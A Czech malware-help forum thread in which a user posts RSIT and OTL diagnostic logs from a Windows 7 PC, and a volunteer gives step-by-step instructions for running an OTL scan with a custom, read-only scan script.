"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux1"=wdmaud.drv
"wave6"=wdmaud.drv
"midi6"=wdmaud.drv
"mixer6"=wdmaud.drv
"aux2"=wdmaud.drv
"wave7"=wdmaud.drv
"midi7"=wdmaud.drv
"mixer7"=wdmaud.drv
"aux3"=wdmaud.drv
"wave8"=wdmaud.drv
"midi8"=wdmaud.drv
"mixer8"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"VIDC.FPS1"=frapsv64.dll

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\NOTEPAD.EXE %1

======List of files/folders created in the last 1 month======

2014-12-09 16:36:56 ----D---- C:\Program Files\trend micro
2014-12-09 16:36:55 ----D---- C:\rsit
2014-12-09 08:41:36 ----A---- C:\Windows\system32\drivers\kl1.sys
2014-12-09 08:41:34 ----DC---- C:\Windows\system32\DRVSTORE
2014-12-09 08:41:34 ----A---- C:\Windows\system32\drivers\klif.sys
2014-12-09 08:41:34 ----A---- C:\Windows\system32\drivers\klflt.sys
2014-12-09 08:11:58 ----A---- C:\Windows\system32\drivers\tcpip.sys
2014-12-09 08:11:58 ----A---- C:\Windows\system32\drivers\netio.sys
2014-12-09 07:50:59 ----A---- C:\Windows\system32\drivers\MBAMSwissArmy.sys
2014-12-09 07:50:37 ----D---- C:\ProgramData\Malwarebytes
2014-12-09 07:50:37 ----D---- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mwac.sys
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mbamchameleon.sys
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mbam.sys
2014-12-08 23:30:06 ----D---- C:\1470d06be47cb175c79779ff1f
2014-12-08 11:39:47 ----D---- C:\Program Files (x86)\Microsoft ASP.NET
2014-12-07 21:13:51 ----D---- C:\Program Files (x86)\MySQL
2014-12-07 12:42:04 ----D---- C:\Program Files\Microsoft SDKs
2014-12-07 12:40:29 ----D---- C:\ProgramData\PreEmptive Solutions
2014-12-06 16:39:55 ----D---- C:\Program Files (x86)\CE Remote Tools
2014-12-06 16:39:51 ----SHD---- C:\Config.Msi
2014-12-06 16:39:02 ----D---- C:\Program Files (x86)\Microsoft Web Designer Tools
2014-12-06 16:38:50 ----RHD---- C:\MSOCache
2014-12-06 10:37:25 ----D---- C:\Program Files (x86)\Check Point Software Technologies LTD
2014-12-06 10:36:53 ----D---- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
2014-12-06 10:36:49 ----D---- C:\Program Files (x86)\CheckPoint
2014-12-06 10:34:43 ----D---- C:\ProgramData\CheckPoint
2014-11-28 21:49:14 ----D---- C:\KMPlayer
2014-11-27 08:31:52 ----D---- C:\Program Files (x86)\HTML Help Workshop
2014-11-27 08:31:33 ----D---- C:\Program Files (x86)\Microsoft Help Viewer
2014-11-27 08:31:02 ----D---- C:\Windows\SYSWOW64\1033
2014-11-27 08:25:53 ----D---- C:\Windows\system32\1033
2014-11-20 09:35:43 ----D---- C:\Program Files (x86)\Blaze Media Pro
2014-11-20 09:35:37 ----HDC---- C:\ProgramData\{784E3329-1B2A-421E-9427-596088B766F6}
2014-11-11 22:06:35 ----D---- C:\Windows\symbols
2014-11-11 22:06:32 ----D---- C:\Program Files\Microsoft Visual Studio 11.0
2014-11-11 18:36:42 ----D---- C:\Windows\SYSWOW64\bitstreams
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\zlib1.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\ssleay32.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\pthreadVC2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\pthreadGC2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libssh2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\librtmp.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libidn-11.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libeay32.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libcurl-4.dll
2014-11-11 18:36:41 ----AS---- C:\Windows\SYSWOW64\cudart32_50_35.dll
2014-11-11 14:44:36 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2014-11-11 14:44:36 ----D---- C:\ProgramData\Package Cache
2014-11-11 00:49:23 ----D---- C:\Program Files (x86)\Mozilla Firefox
2014-11-10 22:52:18 ----D---- C:\Users\Lobo\AppData\Roaming\e-academy Inc

======List of files/folders modified in the last 1 month======

2014-12-09 16:36:56 ----RD---- C:\Program Files
2014-12-09 16:36:56 ----D---- C:\Windows\Prefetch
2014-12-09 16:36:46 ----D---- C:\Windows\Temp
2014-12-09 15:33:01 ----D---- C:\QIP 2012
2014-12-09 13:52:36 ----D---- C:\Windows\system32\config
2014-12-09 13:47:42 ----D---- C:\Windows\System32
2014-12-09 13:47:41 ----D---- C:\Windows\inf
2014-12-09 13:47:41 ----A---- C:\Windows\system32\PerfStringBackup.INI
2014-12-09 13:41:29 ----D---- C:\ProgramData\NVIDIA
2014-12-09 08:41:46 ----SHD---- C:\System Volume Information
2014-12-09 08:41:36 ----D---- C:\Windows\system32\drivers
2014-12-09 08:41:36 ----D---- C:\Windows\system32\catroot
2014-12-09 08:41:24 ----SHD---- C:\Windows\Installer
2014-12-09 08:37:40 ----D---- C:\Windows\winsxs
2014-12-09 08:37:24 ----D---- C:\Windows\system32\drivers\etc
2014-12-09 08:12:16 ----D---- C:\Windows\system32\DriverStore
2014-12-09 08:12:01 ----D---- C:\Windows
2014-12-09 08:11:43 ----D---- C:\Program Files\Common Files\Microsoft Shared
2014-12-09 08:10:30 ----D---- C:\Windows\SHELLNEW
2014-12-09 08:08:47 ----D---- C:\Windows\SysWOW64
2014-12-09 07:50:37 ----RD---- C:\Program Files (x86)
2014-12-09 07:50:37 ----HD---- C:\ProgramData
2014-12-08 12:43:16 ----D---- C:\Windows\Microsoft.NET
2014-12-08 11:39:54 ----RSD---- C:\Windows\assembly
2014-12-07 21:13:55 ----A---- C:\Windows\SYSWOW64\PerfStringBackup.INI
2014-12-07 12:42:01 ----D---- C:\Program Files\Microsoft Visual Studio 9.0
2014-12-07 12:41:48 ----D---- C:\ProgramData\Microsoft Help
2014-12-07 12:39:18 ----D---- C:\Program Files (x86)\MSBuild
2014-12-07 12:39:16 ----RSD---- C:\Windows\Fonts
2014-12-01 08:32:13 ----D---- C:\Windows\Minidump
2014-11-27 08:31:29 ----SD---- C:\ProgramData\Microsoft
2014-11-27 08:31:29 ----D---- C:\Program Files (x86)\Microsoft SDKs
2014-11-27 08:30:55 ----D---- C:\Program Files\Microsoft SQL Server
2014-11-27 08:30:54 ----D---- C:\Program Files (x86)\Microsoft SQL Server
2014-11-26 22:35:10 ----D---- C:\Users\Lobo\AppData\Roaming\TS3Client
2014-11-26 14:14:24 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2014-11-26 10:02:05 ----D---- C:\Windows\SYSWOW64\cs-CZ
2014-11-26 10:02:05 ----D---- C:\Windows\system32\cs-CZ
2014-11-26 10:00:19 ----D---- C:\Windows\SYSWOW64\en-US
2014-11-26 10:00:19 ----D---- C:\Windows\system32\en-US
2014-11-24 12:36:58 ----D---- C:\Windows\system32\catroot2
2014-11-20 09:50:49 ----SD---- C:\Users\Lobo\AppData\Roaming\Microsoft
2014-11-11 22:07:05 ----D---- C:\Program Files (x86)\Common Files
2014-11-11 21:10:00 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2014-11-11 14:35:56 ----A---- C:\Windows\system32\msvcsv60.dll
2014-11-11 14:35:56 ----A---- C:\Users\Lobo\AppData\Roaming\msregsvv.dll
2014-11-11 13:54:22 ----D---- C:\Program Files (x86)\Microsoft Visual Studio 9.0

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 epfwwfp;epfwwfp; C:\Windows\system32\DRIVERS\epfwwfp.sys [2013-02-14 58416]
R0 KL1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2014-06-11 7717984]
R0 pciide;pciide; C:\Windows\system32\DRIVERS\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2009-07-14 214096]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2009-07-14 514048]
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver; C:\Windows\system32\DRIVERS\dtsoftbus01.sys [2013-04-26 283200]
R1 eamonm;eamonm; C:\Windows\system32\DRIVERS\eamonm.sys [2013-02-14 213416]
R1 ehdrv;ehdrv; C:\Windows\system32\DRIVERS\ehdrv.sys [2013-01-10 150616]
R1 EpfwLWF;Epfw NDIS LightWeight Filter; C:\Windows\system32\DRIVERS\EpfwLWF.sys [2013-01-10 59440]
R1 KLIF;Kaspersky Lab Driver; C:\Windows\system32\DRIVERS\klif.sys [2014-06-11 490592]
R1 Vsdatant;Zone Alarm Firewall Driver; C:\Windows\system32\DRIVERS\vsdatant.sys [2014-08-13 450456]
R2 epfw;epfw; C:\Windows\system32\DRIVERS\epfw.sys [2013-01-10 190232]
R3 CVPNDRVA;Cisco Systems Inc. IPSec Driver; \??\C:\Windows\system32\Drivers\CVPNDRVA.sys [2011-03-04 306536]
R3 DNE;Deterministic Network Enhancer Miniport; C:\Windows\system32\DRIVERS\dne64x.sys [2008-11-16 157968]
R3 gdrv;gdrv; \??\C:\Windows\gdrv.sys [2014-12-09 25640]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2010-04-06 2337440]
R3 MBAMProtector;MBAMProtector; \??\C:\Windows\system32\drivers\mbam.sys [2014-11-21 25816]
R3 MBAMSwissArmy;MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [2014-12-09 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl; \??\C:\Windows\system32\drivers\mwac.sys [2014-11-21 63704]
R3 NVHDA;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys [2012-12-19 194488]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2010-03-22 347680]
S3 CVirtA;Cisco Systems VPN Adapter for 64-bit Windows; C:\Windows\system32\DRIVERS\CVirtA64.sys [2010-02-08 14992]
S3 GVTDrv64;GVTDrv64; \??\C:\Windows\GVTDrv64.sys [2013-04-19 30528]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2009-07-14 165376]
S3 usbscan;Ovladač skeneru USB; C:\Windows\system32\DRIVERS\usbscan.sys [2009-07-14 41984]
S3 WinRing0_1_2_0;WinRing0_1_2_0; \??\C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys [2012-08-01 14544]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 aaLogger;ArchestrA Logger; C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe [2007-07-18 229446]
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-09-12 64704]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]
R2 CVPND;Cisco Systems, Inc. VPN Service; C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe [2011-03-04 1529856]
R2 DragonUpdater;COMODO Dragon Update Service; C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe [2014-05-27 2139328]
R2 ekrn;ESET Service; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [2013-03-21 1341664]
R2 ES lite Service;ES lite Service for program management.; C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE [2009-08-24 68136]
R2 FS Service Control;FS Service Control; C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe [2005-01-12 32845]
R2 MBAMService;MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-11-21 969016]
R2 MBAMScheduler;MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-11-21 1871160]
R2 MSSQL$SQLEXPRESS;SQL Server (SQLEXPRESS); C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2007-02-10 29178224]
R2 NMSAccess;NMSAccess; C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe [2009-01-12 71096]
R2 nvsvc;NVIDIA Display Driver Service; C:\Windows\system32\nvvsvc.exe [2013-03-15 877856]
R2 nvUpdatusService;NVIDIA Update Service Daemon; C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2013-03-15 1266464]
R2 PDF Architect Helper Service;PDF Architect Helper Service; C:\Program Files (x86)\PDF Architect\HelperService.exe [2014-01-23 1335344]
R2 PDF Architect Service;PDF Architect Service; C:\Program Files (x86)\PDF Architect\ConversionService.exe [2014-01-23 856112]
R2 slssvc;Wonderware SuiteLink; C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe [2005-05-05 40960]
R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 156016]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service; C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2013-03-14 383264]
R2 TeamViewer9;TeamViewer 9; C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [2013-12-17 5341536]
R2 vsmon;TrueVector Internet Monitor; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [2014-08-13 3596752]
R2 ZAPrivacyService;ZoneAlarm Privacy Service; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe [2014-08-13 96272]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2012-07-09 104912]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2012-07-08 123856]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc []
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-04-03 315008]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-26 267440]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2012-07-08 51648]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc []
S3 IDriverT;InstallDriver Table Manager; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-03 69632]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2014-11-11 114288]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 Steam Client Service;Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [2014-10-21 833728]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 WWNetDDE;Wonderware NetDDE Helper; C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe [2007-07-18 80688]
S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
S4 msvsmon90;Visual Studio 2008 Remote Debugger; C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe [2007-11-07 4466688]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 SQLBrowser;SQL Server Browser; C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]

-----------------EOF-----------------
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Malware - prosim o kontrolu logu

#2 Příspěvek od vyosek »

Zdravim :)

:arrow: Stahnete OTL http://oldtimer.geekstogo.com/OTL.exe a ulozte jej na plochu
  • Pokud pouzivate Win Vista ci W7, kliknete na OTL pravym a dejte Run As Administrator ci Spustit jako spravce
  • Pokud pouzivate 64bitovy OS, zkontrolujte, zda-li je zaskrtnuty ctverecek u Pro 64 bitové OS, pokud ne, zaskrtnete jej
  • Zaskrtnete okenko Pro vsechny uzivatele
  • Zaskrtnete okenko Kontrola na havet "LOP"
  • Zaskrtnete okenko Kontrola na havet "Purity"
  • Stari souboru zmente z 30 dnu na 7 dnu
  • Do spodniho okenka Vlastni skenovani/opravy vlozte skript nize

  • Kód: Vybrat vše

    CREATERESTOREPOINT

netsvcs
drivers32
savembr:0

/md5start
atapi.sys
autochk.exe
cdrom.sys
explorer.exe
hal.dll
scecli.dll
services.exe
svchost.exe
tcpip.sys
userinit.exe
winlogon.exe
/md5stop

%systemroot%*.* /U /s
%SYSTEMDRIVE%\*.exe
%ALLUSERSPROFILE%\Application Data\*.
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.
%APPDATA%\*.exe /s
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\system32\drivers\*.sys /3
%systemroot%\system32\*.* /3
%SYSTEMDRIVE%\*.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s

%PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5
%PROGRAMFILES%\Internet Explorer\iexplore.exe /md5
%PROGRAMFILES%\Opera\opera.exe /md5
%PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5

%SystemDrive%\PhysicalMBR.bin /md5 

*crack* /s
*keygen* /s
*loader* /s
  • Kliknete na tlacitko Prohledat
  • Po dokonceni skenu (cca 10 az 15 min) se objevi logy OTL.txt a Extras.txt, oba sem vlozte
  • Pokud budou logy dlouhe (forum bude kricet o prekroceni maximalniho poctu znaku), tak je rozdelte do vice prispevku
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Re: Malware - prosim o kontrolu logu

#3 Příspěvek od chvostik »

OTL Extras logfile created on: 9.12.2014 17:34:27 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Lobo\Desktop
64bit- Ultimate Edition (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

4,00 Gb Total Physical Memory | 2,14 Gb Available Physical Memory | 53,53% Memory free
7,99 Gb Paging File | 4,61 Gb Available in Paging File | 57,73% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 55,89 Gb Total Space | 9,14 Gb Free Space | 16,35% Space Free | Partition Type: NTFS
Drive D: | 1863,01 Gb Total Space | 848,85 Gb Free Space | 45,56% Space Free | Partition Type: NTFS
Drive E: | 465,75 Gb Total Space | 23,48 Gb Free Space | 5,04% Space Free | Partition Type: NTFS
Drive F: | 74,52 Gb Total Space | 5,05 Gb Free Space | 6,77% Space Free | Partition Type: NTFS
Drive G: | 2,92 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF
Drive H: | 3,31 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF

Computer Name: LOBO-PC | User Name: Lobo | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
.txt[@ = txtfile] -- C:\Windows\NOTEPAD.EXE (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.txt [@ = txtfile] -- C:\Windows\NOTEPAD.EXE (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)

========== Shell Spawning ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- C:\Windows\NOTEPAD.EXE %1 (Microsoft Corporation)
Unknown [openas] -- "C:\Program Files (x86)\Smart File Advisor\sfa.exe" /unknown "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- C:\Windows\NOTEPAD.EXE %1 (Microsoft Corporation)
Unknown [openas] -- "C:\Program Files (x86)\Smart File Advisor\sfa.exe" /unknown "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

========== Authorized Applications List ==========


========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{36B0ABEC-C4F4-422D-B012-B4408F641A18}" = rport=139 | protocol=6 | dir=out | app=system |
"{46E58CD5-6D4B-4A68-85BE-577212F19D69}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{69FC7271-A619-4FE9-BE91-81F827C42E37}" = rport=137 | protocol=17 | dir=out | app=system |
"{6E93A67E-A11C-4039-A83F-BD7F72928EC2}" = lport=3702 | protocol=17 | dir=in | app=d:\dreamspark\microsoft visual studio 11.0\common7\ide\devenv.exe |
"{713F7422-E651-40B9-876F-60D652F0AE13}" = rport=138 | protocol=17 | dir=out | app=system |
"{7534E2A6-6E5F-4DBA-8DA1-ECA2ED7514ED}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{8B5EA31A-0C9E-424C-9E86-BF307CF67C7F}" = lport=139 | protocol=6 | dir=in | app=system |
"{907D502B-5F5B-47D6-B875-20B7C70AAF86}" = lport=137 | protocol=17 | dir=in | app=system |
"{C1D034E7-01DF-441E-9B49-81F09F15057F}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{C54CFE1B-3A4B-4461-99C8-14B864669565}" = lport=138 | protocol=17 | dir=in | app=system |
"{EE3F355D-0CF7-4D39-BA33-BC09F0DA3AA7}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{F8C2F86A-4B2A-462A-9D8B-558584496671}" = rport=445 | protocol=6 | dir=out | app=system |
"{F90496E9-BA24-494B-B0B5-6A4ADECDEAC5}" = lport=445 | protocol=6 | dir=in | app=system |
"{FCB99043-852A-4466-BC17-1D6F33DF4046}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{00AA119E-1519-4C21-BCC9-06D8F90A90F1}" = protocol=17 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{069A36C9-E536-4E52-B3B3-87AA3C96079D}" = protocol=6 | dir=in | app=d:\steam\steam.exe |
"{0FC3248A-78D6-4955-979E-F46760AD8ADB}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{145D3373-E20B-46F1-93E6-C636DE7E38B2}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_launcher.exe |
"{147B3DC1-4F25-4F5D-B15F-E64DF48898AC}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
